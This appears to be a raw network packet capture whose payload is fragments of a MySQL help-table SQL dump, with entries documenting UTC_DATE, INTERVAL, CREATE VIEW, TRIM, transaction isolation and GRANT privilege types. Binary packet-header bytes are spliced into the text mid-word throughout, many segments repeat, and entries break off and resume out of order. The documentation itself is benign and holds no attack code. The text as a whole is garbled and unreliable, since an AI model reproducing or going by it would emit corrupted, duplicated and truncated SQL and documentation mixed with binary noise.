maximum length of 4,294,967,295 or\n4GB (2^32 - 1) characters. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGTEXT columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(139,'DISJOINT',11,' Disjoint(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spaC ZZ0`BiEL@/)lhe default\ncharacter set. This is the default in MySQL.\n\nAs of MySQL 4.1.2, the BINARY attribute is shorthand for specifying\nthe binary collation of the column character set. Sorting and comparison is\nbased on numeric character values. Before 4.1.2, BINARY attribute\ncauses the column to be treated as a binary string. Sorting and comparison\nis based on numeric byte values.\n\nFrom MySQL 4.1.0 on, column type CHAR BYTE is an alias for\nCHAR BINARY. This is a compatibility feature.\n\nFrom MySQL 4.1.0 on, the ASCII attribute can be specified for\nCHAR. It assigns the latin1 character set.\n\nFrom MySQL 4.1.1 on, the UNICODE attribute can be specified for\nCHAR. It assigns the ucs2 character set.\n\nMySQL allows you to create a column of type CHAR(0). This is mainly\nuseful when you have to be compliant with some old applications that depend\non the existence of a column but that do not actually use the value. This\nis also quite nice when you need a column that can take only two values: A\nCHAR(0) column that is not defined as NOT NULL occupies only\none bit and can take only the values NULL and \'\' (the empty\nstring).\n\n CHAR\nThis is a synonym for CHAR(1).\n','',''),(338,'UTC_DATE',14,' UTC_DATE\n UTC_DATE()\nReturns the current UTC date as a valueC$ bbBi0`ET@/uԂIo0E<@?"  P(# e=C+ ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptjр"l ){CC bb0`BiET@/Ԁo0SE<:@@K=  3PX5tڀ   >)lhe default\ncharacter set. This is the default in MySQL.\n\nAs of MySQL 4.1.2, the BINARY attribute is shorthand for specifying\nthe binary collation of the column character set. Sorting and comparison is\nbased on numeric character values. Before 4.1.2, BINARY attribute\ncauses the column to be treated as a binary string. Sorting and comparison\nis based on numeric byte values.\n\nFrom MySQL 4.1.0 on, column type CHAR BYTE is an alias for\nCHAR BINARY. This is a compatibility feature.\n\nFrom MySQL 4.1.0 on, the ASCII attribute can be specified for\nCHAR. It assigns the latin1 character set.\n\nFrom MySQL 4.1.1 on, the UNICODE attribute can be specified for\nCHAR. It assigns the ucs2 character set.\n\nMySQL allows you to create a column of type CHAR(0). This is mainly\nuseful when you have to be compliant with some old applications that depend\non the existence of a column but that do not actually use the value. This\nis also quite nice when you need a column that can take only two values: A\nCHAR(0) column that is not defined as NOT NULL occupies only\none bit and can take only the values NULL and \'\' (the empty\nstring).\n\n CHAR\nThis is a synonym for CHAR(1).\n','',''),(338,'UTC_DATE',14,' UTC_DATE\n UTC_DATE()\nReturns the current UTC date as a valueCV bb0`BiET@/4o0 E<@@!  P( e=Ci ZZ0`BiEL@/go0AE4T@@ 3 Ptjр"l ){C bbBi0`ET@/p܂Ao0E<;@?L<  3PX:tڀ w  >)l in \'YYYY-MM-DD\' or\nYYYYMMDD format, depending on whether the function is used in a\nstring or numeric context.\n','mysql> SELECT UTC_DATE(), UTC_DATE() + 0;\n -> \'2003-08-14\', 20030814',''),(339,'DIMENSION',19,' Dimension(g)\nReturns the inherent dimension of the geometry value g. The result\ncan be -1, 0, 1, or 2. (The meaning of these values is given in\n[GIS class geometry].)\n','mysql> SELECT Dimension(GeomFromText(\'LineString(1 1,2 2)\'));\n+------------------------------------------------+\n| Dimension(GeomFromText(\'LineString(1 1,2 2)\')) |\n+------------------------------------------------+\n| 1 |\n+------------------------------------------------+',''),(340,'COUNT DISTINCT',12,' COUNT(DISTINCT expr,[expr...])\nReturns a count of the number of different non-NULL values.\n','mysql> SELECT COUNT(DISTINCT results) FROM student;',''),(341,'BIT',1,' BIT[(M)]\n\nA bit-field type. M indicates the number of bits per value, from 1 to\n64. The default is 1 if M is omitted.\n\nThis data type was added in MySQL 5.0.3 for MyISAM, and extended\nin 5.0.5 to MEMORY, InnoDB, and BDB. Before 5.0.3,\nBIT is a synonym for TINYINT(1).\n','',''),(342,'EQUALS',11,' Equals(g1,g2)\nReturns 1 or 0 to indicate whether C ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj"l ){C bb0`BiET@/Ԁo0SE<;@@K<  3PX:tڀ w  >)l in \'YYYY-MM-DD\' or\nYYYYMMDD format, depending on whether the function is used in a\nstring or numeric context.\n','mysql> SELECT UTC_DATE(), UTC_DATE() + 0;\n -> \'2003-08-14\', 20030814',''),(339,'DIMENSION',19,' Dimension(g)\nReturns the inherent dimension of the geometry value g. The result\ncan be -1, 0, 1, or 2. (The meaning of these values is given in\n[GIS class geometry].)\n','mysql> SELECT Dimension(GeomFromText(\'LineString(1 1,2 2)\'));\n+------------------------------------------------+\n| Dimension(GeomFromText(\'LineString(1 1,2 2)\')) |\n+------------------------------------------------+\n| 1 |\n+------------------------------------------------+',''),(340,'COUNT DISTINCT',12,' COUNT(DISTINCT expr,[expr...])\nReturns a count of the number of different non-NULL values.\n','mysql> SELECT COUNT(DISTINCT results) FROM student;',''),(341,'BIT',1,' BIT[(M)]\n\nA bit-field type. M indicates the number of bits per value, from 1 to\n64. The default is 1 if M is omitted.\n\nThis data type was added in MySQL 5.0.3 for MyISAM, and extended\nin 5.0.5 to MEMORY, InnoDB, and BDB. Before 5.0.3,\nBIT is a synonym for TINYINT(1).\n','',''),(342,'EQUALS',11,' Equals(g1,g2)\nReturns 1 or 0 to indicate whether C ZZ0`BiEL@/go0AE4T@@ 3 Ptj"l ){C[ bbBiʪET@/o0oo0E<@@ #ܭg>&p 7=y8Cu bb0`BiET@/.o0o+PE<@@ T 3 #ܭg>&p$ 7=y8CT bbBi0`ET@/p܂Ao0E<<@?L;  3PX?tڀ   E)mor not g1 is spatially equal to\ng2.\n','',''),(343,'SHOW CREATE VIEW',24,'This statement shows a CREATE VIEW statement that creates\nthe given view.\n','SHOW CREATE VIEW view_name',''),(344,'INTERVAL',26,' INTERVAL(N,N1,N2,N3,...)\nReturns 0 if N < N1, 1 if N < N2\nand so on or -1 if N is NULL. All arguments are treated\nas integers. It is required that N1 < N2 < N3 <\n... < Nn for this function to work correctly. This is because\na binary search is used (very fast).\n','mysql> SELECT INTERVAL(23, 1, 15, 17, 30, 44, 200);\n -> 3\nmysql> SELECT INTERVAL(10, 1, 10, 100, 1000);\n -> 2\nmysql> SELECT INTERVAL(22, 23, 30, 44, 200);\n -> 0',''),(345,'FROM_DAYS',14,' FROM_DAYS(N)\nGiven a daynumber N, returns a DATE value.\n','mysql> SELECT FROM_DAYS(729669);\n -> \'1997-10-07\'',''),(346,'BIT_COUNT',27,' BIT_COUNT(N)\nReturns the number of bits that are set in the argument N.\n','mysql> SELECT BIT_COUNT(29);\n -> 4',''),(347,'UTC_TIMESTAMP',14,' UTC_TIMESTAMP\n UTC_TIMESTAMP()\nReturns the current UTC date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT UTC_TIMESTAMP(), UTC_TIMESTAMP() + 0;\n -> \'2003-0Cp bb0`BiET@/Ԁo0SE<<@@K;  3PX?tڀ   E)mor not g1 is spatially equal to\ng2.\n','',''),(343,'SHOW CREATE VIEW',24,'This statement shows a CREATE VIEW statement that creates\nthe given view.\n','SHOW CREATE VIEW view_name',''),(344,'INTERVAL',26,' INTERVAL(N,N1,N2,N3,...)\nReturns 0 if N < N1, 1 if N < N2\nand so on or -1 if N is NULL. All arguments are treated\nas integers. It is required that N1 < N2 < N3 <\n... < Nn for this function to work correctly. This is because\na binary search is used (very fast).\n','mysql> SELECT INTERVAL(23, 1, 15, 17, 30, 44, 200);\n -> 3\nmysql> SELECT INTERVAL(10, 1, 10, 100, 1000);\n -> 2\nmysql> SELECT INTERVAL(22, 23, 30, 44, 200);\n -> 0',''),(345,'FROM_DAYS',14,' FROM_DAYS(N)\nGiven a daynumber N, returns a DATE value.\n','mysql> SELECT FROM_DAYS(729669);\n -> \'1997-10-07\'',''),(346,'BIT_COUNT',27,' BIT_COUNT(N)\nReturns the number of bits that are set in the argument N.\n','mysql> SELECT BIT_COUNT(29);\n -> 4',''),(347,'UTC_TIMESTAMP',14,' UTC_TIMESTAMP\n UTC_TIMESTAMP()\nReturns the current UTC date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT UTC_TIMESTAMP(), UTC_TIMESTAMP() + 0;\n -> \'2003-0C bbBi0`ET@/p܂Ao0E<=@?L:  3PXDtڀ q  E)m8-14 18:08:04\', 20030814180804',''),(348,'+',4,' +\nAddition:\n','mysql> SELECT 3+5;\n -> 8',''),(349,'INET_NTOA',21,' INET_NTOA(expr)\nGiven a numeric network address (4 or 8 byte), returns the dotted-quad\nrepresentation of the address as a string.\n','mysql> SELECT INET_NTOA(3520061480);\n -> \'209.207.224.40\'',''),(350,'ACOS',4,' ACOS(X)\nReturns the arc cosine of X, that is, the value whose cosine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ACOS(1);\n -> 0.000000\nmysql> SELECT ACOS(1.0001);\n -> NULL\nmysql> SELECT ACOS(0);\n -> 1.570796',''),(351,'ISOLATION',10,'SET [GLOBAL | SESSION] TRANSACTION ISOLATION LEVEL\n{ READ UNCOMMITTED | READ COMMITTED | REPEATABLE READ | SERIALIZABLE }\n\nThis statement\nsets the transaction isolation level for the next transaction, globally, or\nfor the current session.\n\nThe default behavior of SET TRANSACTION is to set the isolation level\nfor the next (not yet\nstarted) transaction. If you use the GLOBAL keyword, the statement\nsets the default transaction level globally for all new connections\ncreated from that point on. Existing connections are unaffected.\nYou need the SUPER\nprivilege to do this. Using the SESSION keyword sets the\ndefault transactC ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj"l )|C ZZBi0`EL@/Ao0E4@?s  P?2y+*bd epkC bb0`BiET@/Ԁo0SE<=@@K:  3PXDtڀ q  E)m8-14 18:08:04\', 20030814180804',''),(348,'+',4,' +\nAddition:\n','mysql> SELECT 3+5;\n -> 8',''),(349,'INET_NTOA',21,' INET_NTOA(expr)\nGiven a numeric network address (4 or 8 byte), returns the dotted-quad\nrepresentation of the address as a string.\n','mysql> SELECT INET_NTOA(3520061480);\n -> \'209.207.224.40\'',''),(350,'ACOS',4,' ACOS(X)\nReturns the arc cosine of X, that is, the value whose cosine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ACOS(1);\n -> 0.000000\nmysql> SELECT ACOS(1.0001);\n -> NULL\nmysql> SELECT ACOS(0);\n -> 1.570796',''),(351,'ISOLATION',10,'SET [GLOBAL | SESSION] TRANSACTION ISOLATION LEVEL\n{ READ UNCOMMITTED | READ COMMITTED | REPEATABLE READ | SERIALIZABLE }\n\nThis statement\nsets the transaction isolation level for the next transaction, globally, or\nfor the current session.\n\nThe default behavior of SET TRANSACTION is to set the isolation level\nfor the next (not yet\nstarted) transaction. If you use the GLOBAL keyword, the statement\nsets the default transaction level globally for all new connections\ncreated from that point on. Existing connections are unaffected.\nYou need the SUPER\nprivilege to do this. Using the SESSION keyword sets the\ndefault transactC ZZ0`BiEL@/go0AE4T@@ 3 Ptj"l )|C ZZ0`BiEL@/!o0pE4@@r  P?2y+*bd epkC bbBi0`ET@/p܂Ao0E<>@?L9  3PXItڀ 0(  H)mion level for all future transactions performed on the\ncurrent connection.\n\nFor descriptions of each InnoDB transaction isolation level, see\n[InnoDB transaction isolation, InnoDB transaction isolation].\nInnoDB supports each of these levels\nfrom MySQL 4.0.5 on. The default level is REPEATABLE READ.\n\nYou can set the initial default global isolation level for mysqld with\nthe --transaction-isolation option.\nSee also : [Server options].\n','',''),(352,'CEILING',4,' CEILING(X)\n CEIL(X)\nReturns the smallest integer value not less than X.\n','mysql> SELECT CEILING(1.23);\n -> 2\nmysql> SELECT CEIL(-1.23);\n -> -1',''),(353,'SIN',4,' SIN(X)\nReturns the sine of X, where X is given in radians.\n','mysql> SELECT SIN(PI());\n -> 0.000000',''),(354,'DAYOFWEEK',14,' DAYOFWEEK(date)\nReturns the weekday index\nfor date (1 = Sunday, 2 = Monday, ..., 7 =\nSaturday). These index values correspond to the ODBC standard.\n','mysql> SELECT DAYOFWEEK(\'1998-02-03\');\n -> 3',''),(355,'LINEFROMWKB',13,' LineFromWKB(wkb[,srid])\n LineStringFromWKB(wkb[,srid])\nConstructs a LINESTRING value using its WKB representation and SRID.\n','',''),(356,'GEOMETRYTYPE',19,' GeometryType(g)\nReturns as a string the name of the geometry type of which\nC bb0`BiET@/Ԁo0SE<>@@K9  3PXItڀ 0(  H)mion level for all future transactions performed on the\ncurrent connection.\n\nFor descriptions of each InnoDB transaction isolation level, see\n[InnoDB transaction isolation, InnoDB transaction isolation].\nInnoDB supports each of these levels\nfrom MySQL 4.0.5 on. The default level is REPEATABLE READ.\n\nYou can set the initial default global isolation level for mysqld with\nthe --transaction-isolation option.\nSee also : [Server options].\n','',''),(352,'CEILING',4,' CEILING(X)\n CEIL(X)\nReturns the smallest integer value not less than X.\n','mysql> SELECT CEILING(1.23);\n -> 2\nmysql> SELECT CEIL(-1.23);\n -> -1',''),(353,'SIN',4,' SIN(X)\nReturns the sine of X, where X is given in radians.\n','mysql> SELECT SIN(PI());\n -> 0.000000',''),(354,'DAYOFWEEK',14,' DAYOFWEEK(date)\nReturns the weekday index\nfor date (1 = Sunday, 2 = Monday, ..., 7 =\nSaturday). These index values correspond to the ODBC standard.\n','mysql> SELECT DAYOFWEEK(\'1998-02-03\');\n -> 3',''),(355,'LINEFROMWKB',13,' LineFromWKB(wkb[,srid])\n LineStringFromWKB(wkb[,srid])\nConstructs a LINESTRING value using its WKB representation and SRID.\n','',''),(356,'GEOMETRYTYPE',19,' GeometryType(g)\nReturns as a string the name of the geometry type of which\nC bbBi0`ET@/p܂Ao0E SELECT GeometryType(GeomFromText(\'POINT(1 1)\'));\n+------------------------------------------+\n| GeometryType(GeomFromText(\'POINT(1 1)\')) |\n+------------------------------------------+\n| POINT |\n+------------------------------------------+',''),(357,'GRANT TYPES',7,'For the GRANT and REVOKE statements, priv_type can be\nspecified as any of the following:\n\n Privilege Meaning\n ALL [PRIVILEGES] Sets all simple privileges except GRANT OPTION\n ALTER Allows use of ALTER TABLE\n ALTER ROUTINE Alter or drop stored routines\n CREATE Allows use of CREATE TABLE\n CREATE ROUTINE Create stored routines\n CREATE TEMPORARY TABLES Allows use of CREATE TEMPORARY TABLE\n CREATE USER Allows use of CREATE USER, DROP USER, RENAME USER, and REVOKE ALL PRIVILEGES.\n CREATE VIEW Allows use of CREATE VIEW\n DELETE Allows use of DELETE\n DROP Allows use of DROP TABLE\n EXECUTE Allows the user to run stored routines\n FILE Allows use of SELECT ... INTO OUTFILE and LOAD DATA INFILE\n INDEX Allows use of CREATE INDEX and DROP INDEX\n INSERT Allows use of INSERT\n LOCK TC ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj"l~ )}C ZZBi0`EL@/܂Sŀo0E4@?R 3 PZiD."l0 )}_C& bb0`BiET@/Ԁo0SE SELECT GeometryType(GeomFromText(\'POINT(1 1)\'));\n+------------------------------------------+\n| GeometryType(GeomFromText(\'POINT(1 1)\')) |\n+------------------------------------------+\n| POINT |\n+------------------------------------------+',''),(357,'GRANT TYPES',7,'For the GRANT and REVOKE statements, priv_type can be\nspecified as any of the following:\n\n Privilege Meaning\n ALL [PRIVILEGES] Sets all simple privileges except GRANT OPTION\n ALTER Allows use of ALTER TABLE\n ALTER ROUTINE Alter or drop stored routines\n CREATE Allows use of CREATE TABLE\n CREATE ROUTINE Create stored routines\n CREATE TEMPORARY TABLES Allows use of CREATE TEMPORARY TABLE\n CREATE USER Allows use of CREATE USER, DROP USER, RENAME USER, and REVOKE ALL PRIVILEGES.\n CREATE VIEW Allows use of CREATE VIEW\n DELETE Allows use of DELETE\n DROP Allows use of DROP TABLE\n EXECUTE Allows the user to run stored routines\n FILE Allows use of SELECT ... INTO OUTFILE and LOAD DATA INFILE\n INDEX Allows use of CREATE INDEX and DROP INDEX\n INSERT Allows use of INSERT\n LOCK TC8 ZZ0`BiEL@/go0AE4T@@ 3 Ptj"l~ )}CI ZZ0`BiEL@/o0  E4@@Q 3 PZiD."l0 )}_CN ZZBi0`EL@/܂Sŀo0E4p@? 3 P'tU5 )}Cd ZZ0`BiEL@/go0AE4p@@ 3 P'tU5 )}Cc" bbBi0`ET@/p܂Ao0E<@@?L7  3PXSɟtڀ N  I)nABLES Allows use of LOCK TABLES on tables for which you have the SELECT privilege\n PROCESS Allows use of SHOW FULL PROCESSLIST\n REFERENCES Not implemented\n RELOAD Allows use of FLUSH\n REPLICATION CLIENT Allows the user to ask where slave or master servers are\n REPLICATION SLAVE Needed for replication slaves (to read binary log events from the master)\n SELECT Allows use of SELECT\n SHOW DATABASES SHOW DATABASES shows all databases\n SHOW VIEW Allows use of SHOW CREATE VIEW\n SHUTDOWN Allows use of mysqladmin shutdown\n SUPER Allows use of CHANGE MASTER, KILL,\nPURGE MASTER LOGS, and SET GLOBAL statements, the mysqladmin debug command; allows you to connect (once) even if max_connections is reached\n UPDATE Allows use of UPDATE\n USAGE Synonym for ``no privileges\'\'\n GRANT OPTION Allows privileges to be granted\n \n','',''),(358,'CREATE VIEW',24,'This statement creates a new view, or replaces an existing one if the\nOR REPLACE clause is given. The select_statement is a\nSELECT statement that provides the definition of the view.\nThe statement can select from base tables or other views.\n\nThis statement requires the CREATE VIEW privilege for the view, and\nsome privilege for each column selected by the SELECC~" bb0`BiET@/Ԁo0SE<@@@K7  3PXSɟtڀ N  I)nABLES Allows use of LOCK TABLES on tables for which you have the SELECT privilege\n PROCESS Allows use of SHOW FULL PROCESSLIST\n REFERENCES Not implemented\n RELOAD Allows use of FLUSH\n REPLICATION CLIENT Allows the user to ask where slave or master servers are\n REPLICATION SLAVE Needed for replication slaves (to read binary log events from the master)\n SELECT Allows use of SELECT\n SHOW DATABASES SHOW DATABASES shows all databases\n SHOW VIEW Allows use of SHOW CREATE VIEW\n SHUTDOWN Allows use of mysqladmin shutdown\n SUPER Allows use of CHANGE MASTER, KILL,\nPURGE MASTER LOGS, and SET GLOBAL statements, the mysqladmin debug command; allows you to connect (once) even if max_connections is reached\n UPDATE Allows use of UPDATE\n USAGE Synonym for ``no privileges\'\'\n GRANT OPTION Allows privileges to be granted\n \n','',''),(358,'CREATE VIEW',24,'This statement creates a new view, or replaces an existing one if the\nOR REPLACE clause is given. The select_statement is a\nSELECT statement that provides the definition of the view.\nThe statement can select from base tables or other views.\n\nThis statement requires the CREATE VIEW privilege for the view, and\nsome privilege for each column selected by the SELECCD' bbBi0`ET@/p܂Ao0E CREATE VIEW test.v AS SELECT * FROM t;\n\nTables and views share the same namespace within a database, so a database\ncannot contain a table and a view that have the same name.\n\nViews must have unique column names with no duplicates, just like base\ntables. By default, the names of the columns retrieved by the SELECT\nstatement are used for the view column names. To define explicit names for\nthe view columns, the optional column_list clause can be given as a\nlist of comma-separated identifiers. The number of names in\ncolumn_list must be the same as the number of columns retrieved by the\nSELECT statement.\n\nColumns retrieved by the SELECT statement can be simple references to\ntable columns. They can also be expressions that use functions, constant\nvalues, operators, and so forth.\n\nUnqualified table or view names in the SELECT statement are\ninterpreted CM' ZZBi0`EL@/Ao0E4/@?Z  ePZ>߀! eu_یCf' bb0`BiET@/Ԁo0SE CREATE VIEW test.v AS SELECT * FROM t;\n\nTables and views share the same namespace within a database, so a database\ncannot contain a table and a view that have the same name.\n\nViews must have unique column names with no duplicates, just like base\ntables. By default, the names of the columns retrieved by the SELECT\nstatement are used for the view column names. To define explicit names for\nthe view columns, the optional column_list clause can be given as a\nlist of comma-separated identifiers. The number of names in\ncolumn_list must be the same as the number of columns retrieved by the\nSELECT statement.\n\nColumns retrieved by the SELECT statement can be simple references to\ntable columns. They can also be expressions that use functions, constant\nvalues, operators, and so forth.\n\nUnqualified table or view names in the SELECT statement are\ninterpreted Cx' ZZ0`BiEL@/o0  E4/@@Y  ePZ>߀! eu_یC+ bbBi0`ET@/p܂Ao0E CREATE TABLE t (qty INT, price INT);\nmysql> INSERT INTO t VALUES(3, 50);\nmysql> CREATE VIEW v AS SELECT qty, price, qty*price AS value FROM t;\nmysql> SELECT * FROM v;\n+------+-------+-------+\n| qty | price | value |\n+------+-------+-------+\n| 3 | 50 | 150 |\n+------+-------+-------+\n\nA view definition is subject to the following restrictions:\n\n\n --- The SELECT statement cannot contain a subquery in the FROM\nclause.\n\n --- The SELECT statement cannot refer to system or user variables.\n\n --- The SELECT statement cannot refer to prepared statement parameters.\n\n --- Within a stored routine, the definition cannot refer to routine\nparameters or local variables.\n\n --- Any table or view referred to in the definition must exist. However, afterC+ ZZBi0`EL@/Ao0E4@?s  P?2ʀ+*XM evlC+ ZZBi0`EL@/܂Sŀo0E4r@? 3 P'tK$ )~C+ bb0`BiET@/Ԁo0SE CREATE TABLE t (qty INT, price INT);\nmysql> INSERT INTO t VALUES(3, 50);\nmysql> CREATE VIEW v AS SELECT qty, price, qty*price AS value FROM t;\nmysql> SELECT * FROM v;\n+------+-------+-------+\n| qty | price | value |\n+------+-------+-------+\n| 3 | 50 | 150 |\n+------+-------+-------+\n\nA view definition is subject to the following restrictions:\n\n\n --- The SELECT statement cannot contain a subquery in the FROM\nclause.\n\n --- The SELECT statement cannot refer to system or user variables.\n\n --- The SELECT statement cannot refer to prepared statement parameters.\n\n --- Within a stored routine, the definition cannot refer to routine\nparameters or local variables.\n\n --- Any table or view referred to in the definition must exist. However, afterC+ ZZ0`BiEL@/!o0pE4@@r  P?2ʀ+*XM evlC+ ZZ0`BiEL@/go0AE4r@@ 3 P'tK$ )~C0 bbBi0`ET@/p܂Ao0E CREATE VIEW v AS SELECT CHARSET(CHAR(65)), C0 bb0`BiET@/Ԁo0SE CREATE VIEW v AS SELECT CHARSET(CHAR(65)), C4 bbBi0`ET@/p܂Ao0E SET NAMES \'latin1\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| latin1 | latin1_swedish_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nmysql> SET NAMES \'utf8\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| utf8 | utf8_general_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nThe optional ALGORITHM clause is a MySQL extension to standard SQL.\nALGORITHM takes three values: MERGE, TEMPTABLE, or\nUNDEFINED. The default algorithm is UNDEFINED if no\nALGORITHM clause is present. The algorithm affects how MySQL\nprocesses the view.\n\nFor MERGE, the text of a statement that refers to the view and the view\ndefinition are merged such that parts of the view definition replace\ncorresponding parts of the statement.\n\nFor TEMPTABLE, the results from the view are retrieved into a\ntemporary table, which thenC4 ZZBi0`EL@/܂Sŀo0E4J@?w 3 Pyc0W} )~C4 ZZBi0`EL@/܂Sŀo0E4t@? 3 P&'tA )~C5 bb0`BiET@/Ԁo0SE SET NAMES \'latin1\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| latin1 | latin1_swedish_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nmysql> SET NAMES \'utf8\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| utf8 | utf8_general_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nThe optional ALGORITHM clause is a MySQL extension to standard SQL.\nALGORITHM takes three values: MERGE, TEMPTABLE, or\nUNDEFINED. The default algorithm is UNDEFINED if no\nALGORITHM clause is present. The algorithm affects how MySQL\nprocesses the view.\n\nFor MERGE, the text of a statement that refers to the view and the view\ndefinition are merged such that parts of the view definition replace\ncorresponding parts of the statement.\n\nFor TEMPTABLE, the results from the view are retrieved into a\ntemporary table, which thenC)5 ZZ0`BiEL@/go0AE4J@@w 3 Pyc0W} )~C:5 ZZ0`BiEL@/go0AE4t@@ 3 P&'tA )~CR9 bbBi0`ET@/p܂Ao0E bbBi0`ET@/p܂Ao0E 100;\n\nExample 1: Suppose that we issue this statement:\n\nSELECT * FROM v_merge;\n\nMySQL handles the statement as follows:\n\n\n --- v_merge becomes t\n\n --- * becomes vc1, vc2, which corresponds to c1, c2\n\n --- The view WHERE clause is added\n\n\nThe resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE c3 > 100;\n\nExample 2: Suppose that we issue this statement:\n\nSELECT * FROM v_merge WHERE vc1 < 100;\n\nThis statement is handled similarly to the previous one, except that\nvc1 < 100 becomes c1 < 100 and the view WHERE clause is\nadded to the statement WHERE clause using an AND connective\n(and parentheses are added to make sure the parts of the clause are executed\nwith correct precedence). The resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE (c3 > 100) AND (c1 < 100);\n\nEffectively, the statement to be executed has a WHERE clause of this\nform:\n\nWHERE (select WHERE) AND (view WHERE)\n\nThe MERGE algorithm requires a one-to relationship between the rows\nin the view and the rows in the underlying table. If this relationship does\nnot hold, a temporary table must be used instead. Lack of a one-to-one\nrelationship occurs if the view contains any of a nC=> ZZBi0`EL@/܂Sŀo0E4@?t 3 P\ҤA )7=xCD> bbBi0`ET@/ԂSŀo0E<@?% 3 PU֦w )CJ> ZZBi0`EL@/Ao0E4@?s  P?2ڀ+*N6 e{nCb> bb0`BiET@/Ԁo0SE 100;\n\nExample 1: Suppose that we issue this statement:\n\nSELECT * FROM v_merge;\n\nMySQL handles the statement as follows:\n\n\n --- v_merge becomes t\n\n --- * becomes vc1, vc2, which corresponds to c1, c2\n\n --- The view WHERE clause is added\n\n\nThe resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE c3 > 100;\n\nExample 2: Suppose that we issue this statement:\n\nSELECT * FROM v_merge WHERE vc1 < 100;\n\nThis statement is handled similarly to the previous one, except that\nvc1 < 100 becomes c1 < 100 and the view WHERE clause is\nadded to the statement WHERE clause using an AND connective\n(and parentheses are added to make sure the parts of the clause are executed\nwith correct precedence). The resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE (c3 > 100) AND (c1 < 100);\n\nEffectively, the statement to be executed has a WHERE clause of this\nform:\n\nWHERE (select WHERE) AND (view WHERE)\n\nThe MERGE algorithm requires a one-to relationship between the rows\nin the view and the rows in the underlying table. If this relationship does\nnot hold, a temporary table must be used instead. Lack of a one-to-one\nrelationship occurs if the view contains any of a nCu> ZZʪBiEL@/o0o0oE4@@s 3 P\ҤA )7=xC> bb0`BiET@/g܀o0AE<@@$ 3 PU֦ )C> ZZ0`BiEL@/!o0pE4@@r  P?2ڀ+*N6 e{nC? ZZBi0`EL@/܂Sŀo0E4@?t 3 P\ҦD>t )7=xC? ZZBi0`EL@/܂Sŀo0E4@?t 3 P\ҦD>s )7=xC? ZZʪBiEL@/o0o0oE4@@s 3 P\ҦD>t )7=xC? ZZʪBiEL@/o0o0oE4@@s 3 P\ҦD>s )7=xC!A ZZBiʪEL@/o0oo0E4@@ 3PҦD\= 7=yE)C9A ZZ0`BiEL@/܀o0SE4@@ 3PҦD\= 7=yE)CB bbBi0`ET@/p܂Ao0E SELECT TRIM(\' bar \');\n -> \'bar\'\nmysql> SELECT TRIM(LEADING \'x\' FROM \'xxxbarxxx\');\n -> \'barxxx\'\nmysql> SELECT TRIM(BOTH \'x\' FROM \'xxxbarxxx\');\n -> \'bar\'\nmysql> SELECT TRIM(TRAILING \'xyz\' FROM \'barxxyz\');\n -> \'barx\'',''),(360,'IS',26,' IS boolean_value\n IS NOT bCdO bb0`BiET@/Ԁo0SE SELECT TRIM(\' bar \');\n -> \'bar\'\nmysql> SELECT TRIM(LEADING \'x\' FROM \'xxxbarxxx\');\n -> \'barxxx\'\nmysql> SELECT TRIM(BOTH \'x\' FROM \'xxxbarxxx\');\n -> \'bar\'\nmysql> SELECT TRIM(TRAILING \'xyz\' FROM \'barxxyz\');\n -> \'barx\'',''),(360,'IS',26,' IS boolean_value\n IS NOT bCP bbBi0`ET@/p܂Ao0E<*@?  3P𚟪b   j)qACTION is to set the isolation level\nfor the next (not yet\nstarted) transaction. If you use the GLOBAL keyword, the statement\nsets the default transaction level globally for all new connections\ncreated from that point on. Existing connections are unaffected.\nYou need the SUPER\nprivilege to do this. Using the SESSION keyword sets the\ndefault transaction level for all future transactions performed on the\ncurrent connection.\n\nFor descriptions of each InnoDB transaction isolation level, see\n[InnoDB transaction isolation, InnoDB transaction isolation].\nInnoDB supports each of these levels\nfrom MySQL 4.0.5 on. The default level is REPEATABLE READ.\n\nYou can set the initial default global isolation level for mysqld with\nthe --transaction-isolation option.\nSee also : [Server options].\n','',''),(352,'CEILING',4,' CEILING(X)\n CEIL(X)\nReturns the smallest integer value not less than X.\n','mysql> SELECT CEILING(1.23);\n -> 2\nmysql> SELECT CEIL(-1.23);\n -> -1',''),(353,'SIN',4,' SIN(X)\nReturns the sine of X, where X is given in radians.\n','mysql> SELECT SIN(PI());\n -> 0.000000',''),(354,'DAYOFWEEK',14,' DAYOFWEEK(date)\nReturns the weekday index\nfor date (1 = Sunday, 2 = Monday, ..., 7 =\nSaturday). These index values correCP ZZBi0`EL@/܂Sŀo0E4x@? 3 PF't, )CP bbBi0`ET@/ԂSŀo0E<@?0 3 2P&И )CP 